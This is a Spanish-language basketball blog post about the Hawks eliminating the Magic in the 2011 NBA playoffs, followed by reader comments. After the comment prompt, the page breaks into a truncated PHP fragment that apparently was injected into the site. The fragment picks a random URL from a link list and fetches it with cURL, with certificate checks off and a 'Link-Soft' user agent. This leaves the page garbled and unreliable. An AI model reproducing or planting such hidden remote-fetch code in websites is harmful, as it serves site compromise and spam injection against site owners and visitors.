Primera ronda del Este: Magic 2 – Hawks 4

30 de April de 2011 por TheDeerHunter

Permitid que saquemos pecho. Ni uno sólo de los analistas más reputados de la ESPN daba como ganador a Atlanta. Incluso Sheridan llegó a pronosticar un 4-0. Otro “Epic-Fail” o “Zas en toda la boca”. Tampoco eran mucho más optimistas con respecto a ellos en otros medios. Sin embargo aquí nos desmarcamos completamente y lanzamos un audaz pronóstico a contracorriente: 2-4 para los Hawks. Lo más sorprendente y genial es que me consta que Viva_Dirk tenía previsto otro resultado antes de ponerse a meditar seriamente sobre ello. Para mí el verdadero acierto es el propio análisis y no el pronóstico. Las razones que esgrimió. Pasaré a repasarlas para más gloria de su creador.

– “Dwight contra todos”: Si a Supermán le hubieran dicho a principio de año que iba a marcarse una eliminatoria de 27 puntos por partido, 15.5 rebotes y casi 2 tapones y la iba a perder, le hubiera dado un patatús. Nunca antes se había puesto de manifiesto tal nivel de soledad alrededor de su inmensa figura. A él no se le puede reprochar nada. A sus compañeros y a su entrenador posiblemente sí.

– “Movimiento de balón”: El ratio de pérdidas ha sido terrible en ambos casos. El papel de Crawford ha sido vital, como anticipábamos, y Hinrich ha cumplido bien su cometido. En cambio el de Turkoglu y Arenas ha sido en el mejor de los casos irregular. Nelson, el segundo más prolífico de su equipo, ha demostrado con creces que no es el base ideal para un equipo campeón.

– “Duelo físico”: Diría que el hecho que los Hawks sean superiores o muy superiores a sus rivales exceptuando a Howard, es una axioma. No es casualidad que la mayoría de jugadores de Orlando hayan caído en sus prestaciones. En ocasiones hasta se han pasado en agresividad y fiereza. Decisivo poder contar con 6 faltas por cabeza de Collins, Pachulia, Hilton Armstrong, Etan Thomas o incluso Josh Powell. Si me apuras hasta de Al Horford y Josh Smith. Mucho mérito lo de Supermán.

A estas claves añadiría un par más de mi cosecha: El desempeño defensivo de Jason Richardson es para hacérselo mirar y eso que ha sido de los destacados (¿lo hubiera mejorado Vince Carter a pesar de haberse tirado arrastrándose todo este año en Orlando?). Por su parte cada día parece más claro que Stan Van Gundy es incapaz de revertir una situación adversa. Daimiel dijo de él algo así como “es el típico fulano que recorre todos los días exáctamente el mismo camino y el día que tiene prisa toma un atajo y se pierde”. Supongo que no soy justo con la cita, pero creo que la idea queda patente.

PREMIOS

MVP: Pocos jugadores han sido capaces de desequilibrar una serie de playoffs saliendo desde el banco. No en vano Jamal Crawford es uno de los mejores 6º hombres de los últimos años. Joe Johnson ha sido tan importante como él. Compartido.

Sorpresa: 6 partidos y 6 titularidades para Jason Collins parecen mucho privilegio. Se entiende mejor con 17 minutos y casi 4 faltas por partido.

Decepción: Personificada en Hedo Turkoglu. Demasiado tiempo desaparecido como para esperar de él que fuera el revulsivo para devolver a Orlando a las finales. Alguno seguro que se lo creyó. Hubo un tiempo en que anotaba todos esos clutchs como quien se come una magdalena.

Esfuerzo en vano: ¿Hace falta decirlo? El problema es que Dwight Howard ha aparecido en esta ocasión demasiadas veces como para confiar en sus opciones de campeonato.

Comenta

3 comentarios a esta entrada

  1. Javijaen dice:
    #1

    Me alegro por esta sorpresa, porque además los Hawks han demostrado ser mucho más equipo que unos Magic que el año pasado parecían ser los más completos y ahora parecen una banda. ¿Podrán unos serios Johnson y Crawford a intentar amargar a los Bulls?. Con respecto a Howard, ¿qué hara el próximo año?

      Citar

  2. scriers dice:
    #2

    Te aplaudo Thedeerhunter, no solo acertaste este, también dijistes que phidadelphia quedaría entre los 8 primeros, para mí algo impensable. ¡¡Y acertaste!!

      Citar

  3. TheDeerHunter dice:
    #3

    Cuidado, que yo no fui quien acertó este… pero espera que con todos los palos que se me ha dado este curso con los Spurs aún tengo que decir yo algo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>